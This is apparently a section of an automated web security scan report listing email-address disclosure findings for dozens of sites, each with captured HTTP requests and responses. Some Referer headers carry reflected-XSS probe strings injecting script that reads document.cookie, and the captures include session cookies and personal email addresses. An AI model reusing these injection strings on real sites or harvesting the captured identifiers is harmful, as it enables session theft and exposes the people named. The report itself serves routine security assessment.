href="mailto:simon@FreeBSD.org"><simon@FreeBSD.org></a>
...[SNIP]...
<a
href="mailto:rwatson@FreeBSD.org"><rwatson@FreeBSD.org></a>
...[SNIP]...
<a
href="mailto:secteam@FreeBSD.org"><secteam@FreeBSD.org></a>
...[SNIP]...
<li>FreeBSD-security-notifications@FreeBSD.org</li>

<li>FreeBSD-security@FreeBSD.org</li>

<li>FreeBSD-announce@FreeBSD.org</li>
...[SNIP]...

24.103. http://shop.parenthood.com/blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.parenthood.com
Path:	/blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/

Issue detail

The following email address was disclosed in the response:

Ronna.Mandel@parenthood.com

Request

GET /blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/ HTTP/1.1
Host: shop.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://shop.parenthood.com/blog/goodreadds/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<head profile="http://g
...[SNIP]...
<a href="mailto:Ronna.Mandel@parenthood.com">
...[SNIP]...

24.104. http://simonwillison.net/2004/May/26/addLoadEvent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://simonwillison.net
Path:	/2004/May/26/addLoadEvent/

Issue detail

The following email address was disclosed in the response:

kvbhaskar_dotnet@hotmail.com

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.105. http://sites.inka.de/~bigred/sw/c-nocem.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sites.inka.de
Path:	/~bigred/sw/c-nocem.html

Issue detail

The following email address was disclosed in the response:

olaf@bigred.inka.de

Request

GET /~bigred/sw/c-nocem.html HTTP/1.1
Host: sites.inka.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache/1.3.9 (Unix) Debian/GNU
Connection: close
Content-Type: text/html
Content-Length: 14464

<HTML>
<HEAD>
<TITLE>c-nocem - NoCeM for C News and INN</TITLE>
<LINK REV="made" HREF="mailto:olaf@bigred.inka.de">

</HEAD>

<BODY>

<h
...[SNIP]...

24.106. http://sourceforge.net/projects/nzbget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/nzbget/

Issue detail

The following email address was disclosed in the response:

mytextstreasure@sf.net

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca0eb1000c61; expires="Thu, 21-Jan-2021 16:02:32 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 40706
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img alt="My Text is Treasure icon" src="http://a.fsdn.com/con/icons/my/mytextstreasure@sf.net/MyTextIsTreasure_48.png"/>
...[SNIP]...

24.107. https://spreadsheets0.google.com/embeddedform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://spreadsheets0.google.com
Path:	/embeddedform

Issue detail

The following email address was disclosed in the response:

personal.knowledge@corporate.com

Request

GET /embeddedform?formkey=dEs0YWVVdGdhd05ZeFpYQXNtcU5uN0E6MQ HTTP/1.1
Host: spreadsheets0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:18:41 GMT
Expires: Tue, 25 Jan 2011 13:18:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>Site Removal, Redaction
...[SNIP]...
<label class="ss-q-help" for="entry_3">personal.knowledge@corporate.com</label>
...[SNIP]...

24.108. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The following email address was disclosed in the response:

chris@ozmm.org

Request

GET /wp-content/themes/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 01 Apr 2009 13:22:39 GMT
ETag: "1c4ace-19af-4667e35a8a5c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 6575

/*
* Facebox (for jQuery)
* version: 1.1 (03/01/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

24.109. http://static.sourceforge.net/include/jquery/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.sourceforge.net
Path:	/include/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /include/jquery/jquery.cookie.js HTTP/1.1
Host: static.sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/softwaremap/?a3f06%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8a4aedca02f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=191645736.1294170970.1.1.utmcsr=tortoisesvn.net|utmccn=(referral)|utmcmd=referral|utmcct=/downloads.html; __utma=191645736.1617461905.1294170970.1294170970.1294170970.1

Response

HTTP/1.1 200 OK
Expires: Tue, 25 Jan 2011 04:10:25 GMT
Cache-Control: max-age=7200
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "1010752638"
Last-Modified: Wed, 27 Oct 2010 22:22:57 GMT
Content-Length: 4247
Date: Tue, 25 Jan 2011 02:10:25 GMT
Server: lighttpd/1.4.26

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

24.110. http://tantek.com/log/2004/09.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tantek.com
Path:	/log/2004/09.html

Issue detail

The following email addresses were disclosed in the response:

rsvp@technorati.com
wsg@webstandardsgroup.org

Request

GET /log/2004/09.html HTTP/1.1
Host: tantek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:20:12 GMT
Server: Apache/2
Last-Modified: Sat, 26 Sep 2009 04:25:11 GMT
ETag: "1386a2-18594-474737347f7c0"
Accept-Ranges: bytes
Content-Length: 99732
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us"><head profile="h
...[SNIP]...
<a href="mailto:rsvp@technorati.com">rsvp@technorati.com</a>
...[SNIP]...
<a href="http://www.mail-archive.com/wsg@webstandardsgroup.org/msg08154.html">
...[SNIP]...

24.111. http://thenextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thenextweb.com
Path:	/

Issue detail

The following email address was disclosed in the response:

tips@thenextweb.com

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.112. http://tweetmeme.com/about/advertising/display previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/display

Issue detail

The following email addresses were disclosed in the response:

sales@tweetmeme.com
salesinquiries@federatedmedia.net

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010180473327637
X-Served-In: 0.0058400630950928
X-Served-By: h01
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Dis
...[SNIP]...
<a href="mailto:salesinquiries@federatedmedia.net">
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.113. http://tweetmeme.com/about/advertising/featured_tweets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/featured_tweets

Issue detail

The following email address was disclosed in the response:

sales@tweetmeme.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:59 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00012493133544922
X-Served-In: 0.0067188739776611
X-Served-By: h00
Content-Length: 23493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Fea
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.114. http://tweetmeme.com/about/advertising/retweet_ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/retweet_ads

Issue detail

The following email address was disclosed in the response:

sales@tweetmeme.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0059108734130859
X-Served-By: h03
Content-Length: 23166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ret
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.115. http://tweetmeme.com/about/channels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/channels

Issue detail

The following email address was disclosed in the response:

sales@tweetmeme.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.9897384643555E-5
X-Served-In: 0.0062339305877686
X-Served-By: ded2059
Content-Length: 22892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Cha
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.116. http://tweetmeme.com/about/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/privacy

Issue detail

The following email address was disclosed in the response:

support@tweetmeme.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00013995170593262
X-Served-In: 0.0065500736236572
X-Served-By: h02
Content-Length: 23922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Pri
...[SNIP]...
<a href="mailto:support@tweetmeme.com">support@tweetmeme.com</a>
...[SNIP]...

24.117. http://tweetmeme.com/scripts/search.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/scripts/search.xml

Issue detail

The following email address was disclosed in the response:

support@tweetmeme.com

Request

GET /scripts/search.xml HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:06 GMT
Content-Type: text/xml
Last-Modified: Fri, 12 Feb 2010 14:26:33 GMT
Connection: close
Expires: Mon, 24 Jan 2011 22:51:06 GMT
Cache-Control: max-age=1800
X-Served-By: h02
Content-Length: 1041

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>TweetMeme</ShortName>
<LongName>TweetMeme Search</LongName>
<Descript
...[SNIP]...
<Contact>support@tweetmeme.com</Contact>
...[SNIP]...

24.118. http://tweetmeme.com/user/alexia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/alexia

Issue detail

The following email address was disclosed in the response:

alexia@techcrunch.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044820308685303
X-Served-In: 1.8648369312286
X-Served-By: h01
Content-Length: 39176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
ale
...[SNIP]...
<meta name="description" content="Writer at TechCrunch. Breaks news, hearts. alexia@techcrunch.com" />
...[SNIP]...
<span class="bio">
Writer at TechCrunch. Breaks news, hearts. alexia@techcrunch.com </span>
...[SNIP]...

24.119. http://twitter.com/7News/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.120. http://twitter.com/7news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7news

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.121. http://twitter.com/cw56 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cw56

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.122. http://twitter.com/datasift previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/datasift

Issue detail

The following email address was disclosed in the response:

support@datasift.net

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.123. http://twitter.com/typekit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/typekit

Issue detail

The following email address was disclosed in the response:

support@typekit.com

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.124. http://twitter.com/ups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ups

Issue detail

The following email address was disclosed in the response:

twitter@ups.com

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.125. http://ubh.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ubh.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

gerard@users.sourceforge.net

Request

GET / HTTP/1.1
Host: ubh.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:41 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 03 Feb 2007 18:10:24 GMT
ETag: "2a6e-428965fc82400"
Accept-Ranges: bytes
Content-Length: 10862
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:02:41 GMT

<!doctype html public "-//IETF//DTD HTML//EN">

<HTML>

<HEAD>

<TITLE>ubh - Home</TITLE>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...

24.126. http://venedet.michnica.net/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:

erik@domain.com
espen@domene.no
fred@domain.com
fred@domain.hu
fred@domaine.com
fred@domein.nl
fred@dominio.com
jan@domena.pl
maria@bernasconi.ch
matti@meikalainen.com
max@mustermann.de
name@domain.com
nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:28 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 11 Jan 2011 21:16:49 GMT
ETag: "cda0fc-36c85-499989a42f240"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
na data valida com {date}",dateInFormatMDY:'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',email:'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',url:"Per favor introdueix una URL valida com http://www.google.com.",currencyDollar:"Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .",oneRequired:"Per favor introdueix alg
...[SNIP]...
SuchAs:"Zadejte pros..m platn.. datum jako {date}",dateInFormatMDY:'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',email:'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',url:"Zadejte pros..m platnou URL adresu jako http://www.google.com.",currencyDollar:"Zadejte pros..m platnou ....stku. Nap....klad $100.00.",oneRequired:"Zadejte pros..m alespo.. jednu hodnotu pro
...[SNIP]...
mrum og andre tegn er ikke tilladt.",dateSuchAs:"Skriv en gyldig dato som {date}",dateInFormatMDY:'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',email:'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',url:'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',currencyDollar:"Skriv et gldigt bel..b. F.eks Kr.100.00 .",oneRequired:"Et eller flere af felterne i denne formular skal udfyldes."
...[SNIP]...
InFormatMDY:"Geben Sie bitte ein gültiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. "31.12.1999")",email:"Geben Sie bitte eine gültige E-Mail Adresse ein. Wie zum Beispiel "maria@bernasconi.ch".",url:"Geben Sie bitte eine gültige URL ein. Wie zum Beispiel http://www.google.ch.",currencyDollar:"Geben Sie bitte einen gültigen Betrag in Schweizer Franken ein. Wie zum Beispiel 10
...[SNIP]...
date}").",dateInFormatMDY:"Geben Sie bitte ein gültiges Datum im Format TT.MM.JJJJ ein (z.B. "31.12.1999").",email:"Geben Sie bitte eine gültige E-Mail-Adresse ein (z.B. "max@mustermann.de").",url:"Geben Sie bitte eine gültige URL ein (z.B. "http://www.google.de").",currencyDollar:"Geben Sie bitte einen gültigen Betrag in EURO ein (z.B. 100.00€).",oneRequi
...[SNIP]...
.lida como {date}",dateInFormatMDY:'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',url:"Por favor ingrese una URL v..lida como http://www.google.com.",currencyDollar:"Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .",oneRequired:"Por favor ingrese algo para
...[SNIP]...
da como {date}",dateInFormatMDY:'Por favor introduce una fecha válida como DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, introduce una dirección de email válida. Por ejemplo, "fred@domain.com".',url:"Por favor introduce una URL válida como http://www.google.com.",currencyDollar:"Por favor introduce una cantidad válida de .... Por ejemplo ...100,00 .",oneRequired:"Por favor in
...[SNIP]...
As:"Palun sisestage kehtiv kuup..ev kujul {date}",dateInFormatMDY:'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',email:'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',url:"Palun sisestage kehtiv URL (n..iteks: http://www.google.com).",currencyDollar:"Palun sisestage kehtiv $ summa (n..iteks: $100.00).",oneRequired:"Palun sisestage midagi v..hemalt ..hele antud
...[SNIP]...
tMDY:'........ .... .......... .......... .... ...... MM/DD/YYYY ........ ........ (.......... "12/31/1999").',email:'........ .... ........ .......... .......... ........ ......... ........ ........ "fred@domain.com".',url:"........ .... URL .......... .......... http://www.google.com ........ .........",currencyDollar:"........ .... ............ .......... ........ ...... ...... ........ ........ .......... 100.
...[SNIP]...
esimerkiksi {date}",dateInFormatMDY:'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',email:'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',url:"Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.",currencyDollar:"Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .",oneRequired:"Ole hyv.. ja
...[SNIP]...
e correcte comme {date}",dateInFormatMDY:'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',email:'Veuillez saisir une adresse de courrier électronique. Par example "fred@domaine.com".',url:"Veuillez saisir une URL, comme http://www.google.com.",currencyDollar:"Veuillez saisir une quantité correcte. Par example 100,00€.",oneRequired:"Veuillez sélectionner au moi
...[SNIP]...
. ........, ...... {date}",dateInFormatMDY:'.... .......... .......... ........ ............ MM/DD/YYYY (...... "12/31/1999")',email:'.... .......... .......... ............ ........... ............: "fred@domain.com".',url:".... .......... .......... ...... .........., ...... http://www.google.com.",currencyDollar:".... .......... ........ .......... ......... ............ $100.00.",oneRequired:".... .......... .
...[SNIP]...
